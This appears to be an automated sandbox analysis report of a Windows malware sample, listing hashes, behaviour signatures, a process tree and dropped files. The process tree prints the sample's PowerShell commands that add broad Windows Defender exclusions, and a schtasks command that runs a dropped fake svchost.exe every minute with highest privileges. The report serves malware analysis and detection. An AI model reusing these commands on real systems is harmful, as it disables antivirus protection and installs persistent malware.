Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2024 10:59

General

  • Target

    $TEMP/Selfconvened.exe

  • Size

    4.5MB

  • MD5

    64b5e984fda860eedf19c29a124094fb

  • SHA1

    760c195741989e17b48ad52c13bed35e8ea51692

  • SHA256

    1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39

  • SHA512

    187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4

  • SSDEEP

    98304:xLIWL25lsofrCgl5PmHGjCYv8LHPrVWPa5Qwy:Fslsofuit0bJWPa5QJ

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe
    "C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1356
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5104
    • C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4464
  • C:\Windows\system32\WindowsPro\svchost.exe
    C:\Windows\system32\WindowsPro\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:212
  • C:\Windows\system32\WindowsPro\svchost.exe
    C:\Windows\system32\WindowsPro\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

    Filesize

    2KB

    MD5

    3d61c3fafacd57fc570153fefcc3bf45

    SHA1

    f0a01b1a27acde8d1d499daeb119e78b2d68f425

    SHA256

    89ed90813893a44310852bd8c730cc4ada856fff05b87a15f0a4f753f828ea28

    SHA512

    5f16cb9e3865edbb689c47655424e0600e1cfb5ced88a6f3d91bf5026494a1766495465c205b9937a4f08fb14fe71fe238e32f6e0d6ac1d1341ba4fa0868a1c9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oltvvamq.hzx.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\System32\WindowsPro\svchost.exe

    Filesize

    10.2MB

    MD5

    fb166bf2b4c23acfe313699a28301927

    SHA1

    db2254b8bb7fca4281979d2d5cd4aefbb9b18d17

    SHA256

    034abe529eb90ead64f3843cf2d314e6d2b13d1026781642a3b5fc8f16e8e319

    SHA512

    3d3cc7105969a481a44fd7006ffb672d7ebc08b0f63183e20fc3111ea6cae671b09a1b2e20bd33606afef39ccca436e1cb05e5aa897f6f0bc7928dcc5d337355

  • memory/1356-5-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/1356-3-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/1356-7-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/1356-8-0x000001E846D70000-0x000001E847118000-memory.dmp

    Filesize

    3.7MB

  • memory/1356-9-0x000001E847120000-0x000001E8473C4000-memory.dmp

    Filesize

    2.6MB

  • memory/1356-10-0x000001E8478C0000-0x000001E847D8C000-memory.dmp

    Filesize

    4.8MB

  • memory/1356-11-0x000001E847410000-0x000001E847422000-memory.dmp

    Filesize

    72KB

  • memory/1356-0-0x00007FFB42953000-0x00007FFB42955000-memory.dmp

    Filesize

    8KB

  • memory/1356-1-0x000001E829F00000-0x000001E82A37A000-memory.dmp

    Filesize

    4.5MB

  • memory/1356-6-0x00007FFB42953000-0x00007FFB42955000-memory.dmp

    Filesize

    8KB

  • memory/1356-4-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/1356-2-0x000001E844980000-0x000001E844D38000-memory.dmp

    Filesize

    3.7MB

  • memory/3384-25-0x0000022EC6400000-0x0000022EC6422000-memory.dmp

    Filesize

    136KB

  • memory/3384-32-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/3384-29-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/3384-28-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB

  • memory/3384-27-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

    Filesize

    10.8MB